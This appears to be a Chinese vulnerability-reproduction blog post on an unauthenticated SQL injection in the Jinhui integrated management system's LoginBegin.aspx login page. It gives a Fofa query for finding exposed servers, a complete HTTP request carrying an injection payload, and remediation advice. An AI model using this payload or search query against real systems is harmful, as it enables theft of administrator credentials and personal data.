0x01 产品描述:
金慧-综合管理信息系统(以下简称“金慧综合管理系统”)是上海金慧软件有限公司基于多年行业系统研发和实施经验,为各类企业量身定制的一套综合性管理解决方案。该系统旨在通过信息化手段,提升企业的管理效率,优化资源配置,实现办公自动化和无纸化办公。系统集成了企业日常办公、项目管理、财务管理、人力资源管理等多个方面的功能,通过统一的平台实现数据的共享和流程的协同。该系统以用户需求为导向,结合行业最佳实践,为企业提供了一套高效、灵活、易用的管理工具。
0x02 漏洞描述:
由于金慧-综合管理信息系统 LoginBegin.aspx没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。
0x03 搜索语句:
Fofa:body="/Portal/LoginBegin.aspx"
0x04 漏洞复现:
POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host:your-ip
User-Agent:Mozilla/4.0(compatible; MSIE 6.0;Windows NT 5.1; SV1;QQDownload732;.NET4.0C;.NET4.0E)
Content-Length:363
Content-Type: application/x-www-form-urlencoded
X-Requested-With:XMLHttpRequest
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28114%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=读取编码后的数据
0x05 修复建议:
关闭互联网暴露面或接口设置访问权限。
建议对所有输入数据进行严格验证,并使用参数化查询。同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。定期进行安全审计,以发现并修复潜在的安全漏洞。
标签:+%,LoginBegin,29%,29,金慧,SQL,2BCHAR%,aspx From: https://blog.csdn.net/xc_214/article/details/142791495